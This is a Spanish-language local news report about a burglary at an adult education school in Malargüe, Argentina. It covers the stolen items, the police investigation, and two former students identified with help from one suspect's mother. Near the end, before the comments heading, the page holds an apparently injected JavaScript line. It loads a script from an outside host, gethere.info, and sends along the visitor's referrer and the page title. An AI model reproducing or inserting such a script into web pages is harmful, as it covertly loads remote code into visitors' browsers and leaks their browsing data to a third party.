El ilícito ocurrió el fin de semana en el Centro de Educación Básica Para Jóvenes y Adultos Maestro Julio Mercado, ubicado Avenida Rufino Ortega y Comandante Salas. Allí personas desconocidas ingresaron después de haber roto una reja y armarios, para luego fugarse con dinero en efectivo y elementos de valor. Los Directos del establecimiento se percataron de lo sucedido recién el lunes.

En dialogo con Malargüe a Diario, el subcomisario Alejandro Domínguez, jefe de la Unidad Investigativa Malargüe, informó que los malvivientes sustrajeron de la escuela una cámara digital, teclados de computadoras, un reflector, golosinas, un cargador de batería, dos banderas, $250 aproximadamente de dinero en efectivo, artículos de librería, entre otros.

Elementos secuestrados

Personal de Investigaciones se abocó al esclarecimiento de este hecho y fue fundamental el aporte de la madre de uno de los delincuentes, quien delató al hijo y entregó parte del material robado.

Posteriormente los investigadores profundizaron en la investigación y pudieron dar con otro de los involucrados en el robo. En esta línea, en la jornada de ayer se realizó un allanamiento donde se logró secuestrar con el resto de los materiales sustraídos.

El Subcomisario comunicó que los dos jóvenes involucrados recuperarán la libertad por no tener anteceden penales, aunque sí tenían antecedentes policiales. A los delincuentes se les imputará el delito de robo.

Ante la consulta si los sujetos eran o son alumnos del colegio, Domínguez aseveró que los dos, uno de 18 años y el otro de 22, son ex alumnos del establecimiento escolar, por lo que conocían el movimiento interno del mismo.

Antes de concluir, el Jefe de Investigaciones recalcó el aporte de la madre de uno de los involucrados y del aporte de la comunidad en general: “Siempre pedimos que la comunidad se comprometa, ya que mancomunadamente podemos esclarecer más hechos y las puertas de nuestra institución están abiertas para recibir cualquier tipo de datos. Además, la identidad de la persona que aporta información nunca se revela, porque si no nos quedarían sin el informante, que es el motor de nuestro trabajo”.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comentarios